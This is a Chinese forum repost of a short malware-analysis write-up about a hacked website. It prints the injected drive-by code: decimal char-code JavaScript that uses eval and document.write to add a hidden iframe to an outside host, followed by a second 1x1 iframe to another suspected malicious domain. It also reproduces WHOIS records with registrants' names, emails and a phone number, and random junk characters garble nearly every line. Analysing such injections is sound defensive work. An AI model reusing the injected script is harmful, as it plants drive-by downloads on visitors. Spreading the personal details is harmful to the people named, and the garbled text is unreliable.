[原创]一篇刚写的分析木马手记

首发在我的博客里面， gU|:Y&lFZg  
Ym\<@[3+!  
http://www.areway.cn/?p=175 $3p48`.\  
+CdUr~6  
wS9V@  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： D>W&#A8&y  
          "PRHQW  
<script>t=’60,105,102,114,97,109,101, o jxK8_kl  
32,115,114,99,61,104,116,116,112,58,47,47, Hqs-q4G$  
102,114,101,101,46,117,45,117,117,117,46,99, H^S<bZ  
110,47,101,114,114,111,114,46,104,116,109, _wb]tE ~g  
32,119,105,100,116,104,61,49,48,48,32,104, XtZd% #2},  
101,105,103,104,116,61,48,62,60,47,105,102, ,qp8Rg|3j  
114,97,109,101,62′; N]/cBGy  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> gvWgw7z  
                                                                                                  3$YbEl@#  
<script>t=’60,105,102,114,97,109,101,32,115, "k@[7 7  
114,99,61,104,116,116,112,58,47,47,102,114, xsRkO9x  
101,101,46,117,45,117,117,117,46,99,110,47, svEe@Kt`  
101,114,114,111,114,46,104,116,109,32,119, [DeDU:  
105,100,116,104,61,49,48,48,32,104,101,105, &gS-.{w "  
103,104,116,61,48,62,60,47,105,102,114,97, B%Qo6*b  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); :^{KY(3  
document.write(t);</script> ?K2E
K'-q  
                                                                                                  \VO
v&s;h  
<html xmlns=” 
9{A4>  
http://www.w3.org/1999/xhtml 2Ul8<${c{  
“> vO9=CCxvq  
<head> P#!gP
3  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> #Ox@[Z1I  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> Gchs$^1`t  
<title>首页 - 爱生活家庭网 n]4Elrxx  
                                                                                                                                                    "wZvr}xk  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 J`[jub  
转换字符串后的大概内容是（谁点击后果自付）： %`5K8eB  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… %Ul,9qG+  
                                                                                                                                  7DK}c]js  
查询玉米u-uuu.cn的详细信息： {#?|&n<  
Domain Name: u-uuu.cn aizws[C  
ROID: 20070901s10001s64972306-cn _>`9]6\&  
Domain Status: ok ;/4x.t#b  
Registrant Organization: 王雷 T&6>Eb0{  
Registrant Name: 王雷 1CZO+MB&"$  
Administrative Email: czlovexs@126.com N\tFK*U^I  
Sponsoring Registrar: 北京万网志成科技有限公司 I*>q7Hsu  
Name Server:ns.yovole.com O[U`(A:  
Name Server:ns1.yovole.com 1|G\&
T  
Registration Date: 2007-09-01 17:54 lAo~w  
Expiration Date: 2008-09-01 17:54 4*f+np  
最后PING了一下地址 都没有什么…. Sw>>]UjU  
                                                                                                V+lS\E.  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. #=)>,6Zw  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> .UX4p =  
<script language=”javascript” src=” v8C($<3%  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script -"H$&p~  
> f0^s<:*  
这个玉米应该有可能是木马作者的： =IX-n$d`>  
foafau.info的详细信息： NM:$Q<n  
Access to INFO WHOIS information is provided to assist persons in {0,6-dd5  
determining the contents of a domain name registration record in the =w!9:I&a0  
Afilias registry database. The data in this record is provided by I<<1mEk  
Afilias Limited for informational purposes only, and Afilias does not #d[Nm+~ko  
guarantee its accuracy.  This service is intended only for query-based 5/U{b5  
access. You agree that you will use this data only for lawful purposes Mby4(M+&n  
and that, under no circumstances will you use this data to: (a) allow, [h B$%i]\<  
enable, or otherwise support the transmission by e-mail, telephone, or pd,d"+  
facsimile of mass unsolicited, commercial advertising or solicitations jFKp~`/#  
to entities other than the data recipient’s own existing customers; or YE*|KL^  
(b) enable high volume, automated, electronic processes that send s}UJv\*  
queries or data to the systems of Registry Operator, a Registrar, or F_w+8)DZ  
Afilias except as reasonably necessary to register domain names or AG%[?1IXW  
modify existing registrations. All rights reserved. Afilias reserves lJfk4 -;M  
the right to modify these terms at any time. By submitting this query, T)q Uf H  
you agree to abide by this policy. Qof%j@  
Domain ID:D22418703-LRMS * Z)j"i  
Domain Name:FOAFAU.INFO Hiwij,1
 
Created On:20-Nov-2007 16:05:42 UTC =tA;JB  
Last Updated On:20-Nov-2007 16:05:44 UTC 0cfGI%  
Expiration Date:20-Nov-2008 16:05:42 UTC An?#B4:  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) yXEI%2~)  
Status:CLIENT DELETE PROHIBITED &'Nzw2  
Status:CLIENT RENEW PROHIBITED 6
M_ W(  
Status:CLIENT TRANSFER PROHIBITED EAWBgOO8iC  
Status:CLIENT UPDATE PROHIBITED &ZFHWI(P
 
Status:TRANSFER PROHIBITED !or_CJ8%  
Registrant ID:GODA-040110615 %c]N-  
Registrant Name:liu hong c}),yQ|!:  
Registrant Organization: ndN*X'  
Registrant Street1:beijing ]D,_<Kk  
Registrant Street2: ?0sTx6x@  
Registrant Street3: [%6
)  
Registrant City:beijing #M#$2Vt  
Registrant State/Province: b-<@3N.9]  
Registrant Postal Code:100000 bJ6C7-w:wa  
Registrant Country:CN Rq?t=7fX)  
Registrant Phone:+86.860108888777 Tz9 (</y  
Registrant Phone Ext.: j}tGcFwvSN  
Registrant FAX: LH_U#P`E  
Registrant FAX Ext.: c8Q2H  
Registrant Email:bbbshiji@163.com km^ZF<.@  
Admin ID:GODA-240110615 -U_,RMw~  
Admin Name:liu hong G*%U0OTi  
Admin Organization: jxhZOLG  
Admin Street1:beijing HSU?4=Q  
Admin Street2: 0SIUp/.  
Admin Street3: !.pcldx  
Admin City:beijing  H4YA  
Admin State/Province: br k
*;  
Admin Postal Code:100000
,(sE|B#s  
Admin Country:CN \4<|QE  
Admin Phone:+86.860108888777 H{9P=l  
Admin Phone Ext.: ]8$H'u(C  
Admin FAX: s?9Y3]&+&M  
Admin FAX Ext.: /yx)_x{  
Admin Email:bbbshiji@163.com [,ulz4"  
Billing ID:GODA-340110615 \x4:i\Fx@  
Billing Name:liu hong gzW{h0iRr  
Billing Organization: lMg#zT!?  
Billing Street1:beijing ,-(D(J;}1  
Billing Street2: (ToD u@p  
Billing Street3: ~h=iZ/g_^_  
Billing City:beijing B *6ncj  
Billing State/Province: SGy2&{\Z  
Billing Postal Code:100000 rHOhi|+  
Billing Country:CN fsnZHL}=n  
Billing Phone:+86.860108888777 SG0PQ  
Billing Phone Ext.: 9CN'29c  
Billing FAX: v7#|%  
Billing FAX Ext.: =_@) KWeX$  
Billing Email:bbbshiji@163.com cuy9QBB :  
Tech ID:GODA-140110615 tW-[.Y -M,  
Tech Name:liu hong x`IWo:j  
Tech Organization: "Vo
ufXM:  
Tech Street1:beijing *0V'rH)  
Tech Street2: yFd942  
Tech Street3: &U}8
@;  
Tech City:beijing Z8Vof~  
Tech State/Province: C#)T$wl[E  
Tech Postal Code:100000 : vgn0IQ  
Tech Country:CN uKD }5M?{  
Tech Phone:+86.860108888777 BYa#<jXtAT  
Tech Phone Ext.: oaILh  
Tech FAX: q.@% H}  
Tech FAX Ext.:  _X=6M gU  
Tech Email:bbbshiji@163.com O1DUBRli!q  
Name Server:NS27.DOMAINCONTROL.COM C"s-ttP   
Name Server:NS28.DOMAINCONTROL.COM anfnqa8  
Name Server: E:A!tu$B  
Name Server: Z6Kp-z(l3  
Name Server: 5e7\tBab  
Name Server: 7(^F@,,@  
Name Server: V3a6QcG  
Name Server: n^5Q f\o  
Name Server: Hfo<EB2Y9N  
Name Server: mV4gw'.;7  
Name Server: ),j6tq[  
Name Server: Vw`Q:qo0:b  
Name Server: OP-{76vE&b  
                                                                                                          W_3BL]^=  
接着下载每个文件里面的代码：  +`ov1h  
一步一步看.. (FgX9SV]p9  
Iij$ce`nx  
]gaeN2  
QF*cdc<  
)"6"g9A  
EdSUBoWF}  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来